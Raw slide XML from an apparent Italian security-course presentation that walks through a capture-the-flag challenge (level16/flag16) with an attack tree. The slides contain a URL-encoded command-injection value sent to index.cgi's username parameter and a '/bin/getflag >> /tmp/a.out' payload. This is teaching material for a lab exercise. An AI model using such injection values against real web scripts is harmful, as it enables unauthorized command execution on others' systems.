          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bin/getflag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> /bin/getflag &gt;&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Questa modifica non farà altro che redirigere l’output dell’esecuzione di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1"/>
              <a:t>getflag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> all’interno del file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" err="1"/>
              <a:t>a.out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t>Ovviamente il file destinazione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" err="1"/>
              <a:t>a.out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> deve trovarsi all’interno di una cartella dove l’utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1"/>
              <a:t>flag16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400"/>
              <a:t> avrà permessi di lettura e scrittura.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" b="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:uFill>
                <a:noFill/>
              </a:uFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394883827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6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="25"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="55" name="Connettore diritto 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A2B23CB-B4E4-5410-CDE3-52D75419391C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="31" idx="2"/>
            <a:endCxn id="54" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2070115" y="3806645"/>
            <a:ext cx="1302898" cy="232168"/>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7" name="Connettore diritto 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CD3EB90-BBFE-5E47-5716-3AEA0FEBB27B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="31" idx="2"/>
            <a:endCxn id="36" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3373013" y="3806645"/>
            <a:ext cx="2849815" cy="22681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7" name="Connettore diritto 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BDCB87D-38E4-1804-C8E9-8A50A7BEFD1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22" idx="2"/>
            <a:endCxn id="46" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6396913" y="3152023"/>
            <a:ext cx="903156" cy="13162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4A4F7672-20AF-3433-A5D5-9FCF61743F03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="22" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4879695" y="2209916"/>
            <a:ext cx="1517218" cy="43641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Connettore diritto 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F8CB38A-B52B-C4F6-D7D8-89C33228A1EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="18" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3373013" y="2209916"/>
            <a:ext cx="1506682" cy="43641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Google Shape;4822;p101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCCD2D65-4409-EDDA-0A26-970C6BDF943A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5996222" y="231955"/>
            <a:ext cx="2784570" cy="1389028"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3822"/>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823;p101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{462D169E-49DA-A01A-1A6C-930CC4C606BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179321" y="231955"/>
            <a:ext cx="2784570" cy="1610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200"/>
              <a:t>AGGIORNAMENTO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALBERO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t> DI  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ATTACCO</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Google Shape;4824;p101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB17CC0F-C289-B7CA-AACB-7C24EA96C261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7941615" y="322874"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Google Shape;4825;p101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C20EC95-C62B-921A-A1AA-1A4CF48FBC12}"/>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826;p101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A197DFF9-854A-3501-FDA7-DAB8171626A6}"/>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827;p101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4AEA212-F56A-A5B2-193A-6E0D5E868AE5}"/>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 name="Connettore diritto 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2556DA2F-5ADE-D507-196A-EC0C36FB8ECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="2"/>
            <a:endCxn id="3" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1211702" y="1179315"/>
            <a:ext cx="1586915" cy="362102"/>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Rettangolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB219DE4-3688-C785-E0F8-733BAE26DBAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1925781" y="673623"/>
            <a:ext cx="1745672" cy="505692"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Bandierina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Triangolo isoscele 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{280A3A8B-446C-D676-492D-E5419E2B5FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="117193" y="1541417"/>
            <a:ext cx="2189018" cy="1579419"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx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it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Attacchi impraticabili</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Connettore diritto 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7915B40-3F40-96E4-B033-9FA12075422E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="2" idx="2"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2798617" y="1179315"/>
            <a:ext cx="2081078" cy="524909"/>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6" name="Rettangolo 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4A499E9-7B32-208B-FCD1-4E78EF055B3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3373013" y="1704224"/>
            <a:ext cx="3013364" cy="505692"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Esecuzione indiretta di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>/bin/getflag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t> come utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>flag16</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rettangolo 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69CC5D6D-6426-3B53-5F30-522A093D21D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2624964" y="2646331"/>
            <a:ext cx="1496098" cy="505692"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Login come utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>level16</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rettangolo 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAC40AE4-C488-0A30-AE18-4425D5C3F198}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5735407" y="2646331"/>
            <a:ext cx="1323012" cy="505692"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Iniezione di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>/bin/getflag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Figura a mano libera: forma 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C256A9B1-7B2C-30E7-2102-927796F49FA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4711806" y="2268774"/>
            <a:ext cx="367145" cy="124707"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 367145"/>
              <a:gd name="connsiteY0" fmla="*/ 6927 h 124707"/>
              <a:gd name="connsiteX1" fmla="*/ 193963 w 367145"/>
              <a:gd name="connsiteY1" fmla="*/ 124691 h 124707"/>
              <a:gd name="connsiteX2" fmla="*/ 367145 w 367145"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 124707"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="367145" h="124707">
                <a:moveTo>
                  <a:pt x="0" y="6927"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="66386" y="66386"/>
                  <a:pt x="132772" y="125845"/>
                  <a:pt x="193963" y="124691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="255154" y="123537"/>
                  <a:pt x="311149" y="61768"/>
                  <a:pt x="367145" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="1905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30" name="CasellaDiTesto 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B769B9BA-007F-31FF-F7D1-12DAA5F2B9D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4639886" y="2394195"/>
            <a:ext cx="479618" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" b="1">
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1">
              <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rettangolo 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{225D09B3-3CA3-CB3B-BAE2-E0C917303550}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2552226" y="3370230"/>
            <a:ext cx="1641573" cy="436415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Iniezione remota</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Connettore diritto 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49CF1855-1CCF-6615-F496-0E121B22BC9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="18" idx="2"/>
            <a:endCxn id="31" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3373013" y="3152023"/>
            <a:ext cx="0" cy="2182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Rettangolo 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFDFED2A-B43A-2CBE-7B76-3497AA3D74B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3767869" y="4033462"/>
            <a:ext cx="4909918" cy="436415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Invio richiesta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>index.cgi?username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>=«%3B%2F%2A%2FSOLUZIONE» </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Rettangolo 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A388DE6-A6B3-272E-1D23-8717834DA5CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6638563" y="3283643"/>
            <a:ext cx="1323012" cy="304795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx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it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Iniezione locale</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Rettangolo 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{966AB8AE-3AC0-7E4B-51DD-2006BBACC045}"/>
              </a:ext>
            </a:extLst>
